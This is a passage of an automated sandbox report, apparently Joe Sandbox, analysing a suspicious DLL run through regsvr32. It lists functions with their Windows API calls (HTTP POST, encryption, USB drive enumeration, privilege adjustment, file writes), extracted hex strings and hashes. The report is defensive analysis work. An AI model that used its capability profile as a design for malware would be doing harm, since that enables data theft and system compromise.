                                                                                                                control_flow_graph 3620 7ff983d458d8-7ff983d458e7 3621 7ff983d458e9-7ff983d458f5 3620->3621 3622 7ff983d458f7-7ff983d45907 3620->3622 3621->3622 3623 7ff983d4593a-7ff983d45945 call 7ff983d3ce38 3621->3623 3624 7ff983d4591e-7ff983d4592d call 7ff983d532e8 3622->3624 3629 7ff983d45947-7ff983d4594c 3623->3629 3628 7ff983d45933-7ff983d45936 3624->3628 3630 7ff983d45909-7ff983d45910 call 7ff983d4a198 3628->3630 3631 7ff983d45938 3628->3631 3630->3623 3634 7ff983d45912-7ff983d4591c call 7ff983d3fa54 3630->3634 3631->3629 3634->3623 3634->3624
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
                                                                                                                • Instruction ID: d2752f5e50acef8140870e9490a96d8526dd62cbb11114fb16b8484f64a0d087
                                                                                                                • Opcode Fuzzy Hash: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
                                                                                                                • Instruction Fuzzy Hash: 8AF049C5B0960681FF55DAE25461BB512867F88B50FCC543CC90FE62D1ED9CF98EC210
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860701742-0
                                                                                                                • Opcode ID: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
                                                                                                                • Instruction ID: b484e3fcce4e869cf951fa763206e8aa0f13c7a2df8b1c63402854d294b94628
                                                                                                                • Opcode Fuzzy Hash: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
                                                                                                                • Instruction Fuzzy Hash: 9EE0C2C0E0E28245FE66A6E21082BB952406F5A310F8C107DE89FE3183CD9D75ADA525
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3649 7ff983d41d54-7ff983d41d6d call 7ff983d464e4 3652 7ff983d41d6f-7ff983d41d71 3649->3652 3653 7ff983d41d73 call 7ff983d41c88 3649->3653 3654 7ff983d41d88-7ff983d41d8c 3652->3654 3656 7ff983d41d78-7ff983d41d7b 3653->3656 3657 7ff983d41d7d-7ff983d41d84 call 7ff983d41d90 3656->3657 3658 7ff983d41d86 3656->3658 3657->3652 3658->3654
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __vcrt_uninitialize_ptd
                                                                                                                • String ID:
                                                                                                                • API String ID: 1180542099-0
                                                                                                                • Opcode ID: aeea10d26ae1b013042fd9a5f16fd04bb196f066fa89625a96f5ca4e8362b718
                                                                                                                • Instruction ID: a01db1813bebd855265213921241b20613eb87f4075f5f61e7943343a456ac1f
                                                                                                                • Opcode Fuzzy Hash: aeea10d26ae1b013042fd9a5f16fd04bb196f066fa89625a96f5ca4e8362b718
                                                                                                                • Instruction Fuzzy Hash: CBE092D0D4D60290EB68E7E06842BB912507F55360FDC2E3DD02FE15D2EEACB14AD600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.15%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseHandle$Http$FileOpenRequest$ConnectErrorInfoLastQueryReadSendWrite
                                                                                                                • String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
                                                                                                                • API String ID: 2464402415-3540460043
                                                                                                                • Opcode ID: 12c0ef27f6b9c01b3bb8397c6b0b57a35711ebde15956b06f0b8fde79ca46654
                                                                                                                • Instruction ID: e89a7c3dfe57380d03c07b89a7c82f1d318de41e6ee2df62ac8ce8b1d54890fb
                                                                                                                • Opcode Fuzzy Hash: 12c0ef27f6b9c01b3bb8397c6b0b57a35711ebde15956b06f0b8fde79ca46654
                                                                                                                • Instruction Fuzzy Hash: 07D1CAB271868281EA20DF95E454B6EB361FB84794FC44139DA5E97BA9DFBCF048C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Device$Setup$CloseControlDetailHandleInterface$00007A922ClassDestroyDevsDriveEnumInfoInformationInterfacesListQueryTypeVolume
                                                                                                                • String ID: USB\$\Floppy
                                                                                                                • API String ID: 1516414671-497063568
                                                                                                                • Opcode ID: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
                                                                                                                • Instruction ID: d5da92164396759e8abf88f359c1bf33e340adfa796cd28c1b36570a1595eb66
                                                                                                                • Opcode Fuzzy Hash: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
                                                                                                                • Instruction Fuzzy Hash: 59C19572A1874186E720DFA5E840BAD77A0FB48754F884139DA5EA3F94EF7CE549CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Crypt$Context$DestroyHash$AcquireEncryptRelease$CreateDataDeriveImportRandom_fread_nolock
                                                                                                                • String ID: @$Microsoft Enhanced Cryptographic Provider v1.0$u
                                                                                                                • API String ID: 2427540687-1418344745
                                                                                                                • Opcode ID: 8239d89c582656e901eb59f2422fdffc84f31b6fe4100522fcdefd294c0c24aa
                                                                                                                • Instruction ID: 25deaecf2fb902c3a03dd3982f5a1ab6eab76f760759e2899d852bfc0abc90ba
                                                                                                                • Opcode Fuzzy Hash: 8239d89c582656e901eb59f2422fdffc84f31b6fe4100522fcdefd294c0c24aa
                                                                                                                • Instruction Fuzzy Hash: 66914973A08B4196E710DFA5E454BAA77B0FBC4784F844039EA8E97A58DF7CE549CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735, xrefs: 00007FF983D097BB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File_invalid_parameter_noinfo_noreturn$Read$CloseHandle$Write
                                                                                                                • String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735
                                                                                                                • API String ID: 4279757298-3815716874
                                                                                                                • Opcode ID: 60f8b95a32a266658893655dd053d12ff4ec0199a105a43e3aee86fb73e21a76
                                                                                                                • Instruction ID: 386bfd910aa94cd0f21cd209a96ad6da87d640d3fe235304b483705514ad78ff
                                                                                                                • Opcode Fuzzy Hash: 60f8b95a32a266658893655dd053d12ff4ec0199a105a43e3aee86fb73e21a76
                                                                                                                • Instruction Fuzzy Hash: DFE1F5B2B0464185EB00DBA5E454BAE7761FB45B98F844139DE5EA7B99DFBCE048C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9, xrefs: 00007FF983D029FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastProcessToken_invalid_parameter_noinfo_noreturn$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                • String ID: 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9
                                                                                                                • API String ID: 3248160585-2762331935
                                                                                                                • Opcode ID: e431ee596d85681b439562a55f96945cc149affcda7174252c12624260dc4824
                                                                                                                • Instruction ID: 56913174f36e586776b48dab6ed8e0d1877c69b0a5c3e71c7466a5aa5e82fd8a
                                                                                                                • Opcode Fuzzy Hash: e431ee596d85681b439562a55f96945cc149affcda7174252c12624260dc4824
                                                                                                                • Instruction Fuzzy Hash: 9141A7B2619B81D1EA10CFA5F45476D6361FB84B94F944139D69ED3AA8DFBCF048C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseFileFirst
                                                                                                                • String ID: >> $\
                                                                                                                • API String ID: 422238183-1673512177
                                                                                                                • Opcode ID: c30822f5294bcdc3cdc020209d6c5a067227237ba144b49aa82bb0e7a68e00da
                                                                                                                • Instruction ID: bd03d35b36b13c98cc0d7b0d59555ae0b95fa2f2ffc71cfd4822bd689bf5ead8
                                                                                                                • Opcode Fuzzy Hash: c30822f5294bcdc3cdc020209d6c5a067227237ba144b49aa82bb0e7a68e00da
                                                                                                                • Instruction Fuzzy Hash: 8B02D2B2A08B8085EB00CBA5E4407AE77B1FB85B94F544239DB9D57799DFBCE498C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                • String ID: ?
                                                                                                                • API String ID: 435049134-1684325040
                                                                                                                • Opcode ID: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
                                                                                                                • Instruction ID: 1ee65c7a077f2bc29e9f7a1d4b29681a076a84eac80a2acc2b421213f1901127
                                                                                                                • Opcode Fuzzy Hash: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
                                                                                                                • Instruction Fuzzy Hash: CCD103A2A086428AE710CFA1D441BB96B90FB44784FCC6539EA4FD7695DFBCF449C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 16.53%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$ByteCharFirstMultiNextWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 2913819974-0
                                                                                                                • Opcode ID: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
                                                                                                                • Instruction ID: d5e36ed7b8de7ed46cc92ee094b25edbe81092ec218eb0839c1335e1b5d8830d
                                                                                                                • Opcode Fuzzy Hash: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
                                                                                                                • Instruction Fuzzy Hash: C2D17CA26196C185DB21DF65C441BFAB3B0FB44B45FC8912ADA4A93684EFB8F249C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
                                                                                                                • API String ID: 0-66563769
                                                                                                                • Opcode ID: 51aab8e757506023fc51d8f8d8e0af77544195e9cd9dcf229d38a5185dfe797c
                                                                                                                • Instruction ID: e081479b340fe81da052ad985e4805718617c68b90af407f5049d897f25a0ce5
                                                                                                                • Opcode Fuzzy Hash: 51aab8e757506023fc51d8f8d8e0af77544195e9cd9dcf229d38a5185dfe797c
                                                                                                                • Instruction Fuzzy Hash: 52A1B6A29156C385EB11EFB1C895BFD2351FF04388F889439EA1E9758ADEB8F159C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CreateDirectory
                                                                                                                • String ID: &p2=b$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4$c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60$flag
                                                                                                                • API String ID: 3745306311-2943265622
                                                                                                                • Opcode ID: bfabe6aaf8cd3fd248ded44c889aec705cac2d46292e130a296a38d6f9056c1c
                                                                                                                • Instruction ID: b71c82213026ba6d9113f664f1bdb997ea8507c6e19f80babb5f6842096b32c0
                                                                                                                • Opcode Fuzzy Hash: bfabe6aaf8cd3fd248ded44c889aec705cac2d46292e130a296a38d6f9056c1c
                                                                                                                • Instruction Fuzzy Hash: 1602C8A3B1478186EF00DBA5D4447AD6361FB447A8F845239EA6E57AD9DFBCF188C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
                                                                                                                • String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
                                                                                                                • API String ID: 971768948-3814959899
                                                                                                                • Opcode ID: 898fc7d3c6a6cd492f15d919f69af9d03099e0da089d16fe76fe1245fcb2529c
                                                                                                                • Instruction ID: 22da7de35cf061477806d72bbe2d3f4a28dd7d6a1bce955a62eaca44eae50bf2
                                                                                                                • Opcode Fuzzy Hash: 898fc7d3c6a6cd492f15d919f69af9d03099e0da089d16fe76fe1245fcb2529c
                                                                                                                • Instruction Fuzzy Hash: 1802AAA2B1478195EF00DBB5D454BAC2321FB447A8F845235DA6D97BEADFB8F085C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee, xrefs: 00007FF983D01AF0
                                                                                                                • h, xrefs: 00007FF983D01D49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$CreateFileProcessWrite
                                                                                                                • String ID: 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee$h
                                                                                                                • API String ID: 2469797495-2933482531
                                                                                                                • Opcode ID: cb384104c03186841014a999532d7d36123cc612bb2e239c6da20cd1d00b46aa
                                                                                                                • Instruction ID: 30a66ff817474f07e623d9f371590ad5ba9e0f4408a643e4921b4a418efa1975
                                                                                                                • Opcode Fuzzy Hash: cb384104c03186841014a999532d7d36123cc612bb2e239c6da20cd1d00b46aa
                                                                                                                • Instruction Fuzzy Hash: 44D1A2A2B1478185EB00CFB9D4547AD2361FB457A8F845739EA6E97BD9DFB8E084C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest_invalid_parameter_noinfo_noreturn$ConnectErrorLastSend
                                                                                                                • String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
                                                                                                                • API String ID: 2032937867-3540460043
                                                                                                                • Opcode ID: ad9b05d3d878f76f211cd19acc44eb979f2447a48f9a7b1ece1c6c838b3820e5
                                                                                                                • Instruction ID: f6ce88c8df8c38bcd39fb59eaefa8a42c1a3e88bc2d1812f8b5b9e015645c394
                                                                                                                • Opcode Fuzzy Hash: ad9b05d3d878f76f211cd19acc44eb979f2447a48f9a7b1ece1c6c838b3820e5
                                                                                                                • Instruction Fuzzy Hash: 86A1C7B2A1878181EA10DF95E488B6EB361FB84794F844139DA5E97BA5DFBCF448C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983D07619
                                                                                                                • a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983D07543
                                                                                                                • 980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983D0746D
                                                                                                                • 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983D07397
                                                                                                                Memory Dump Source
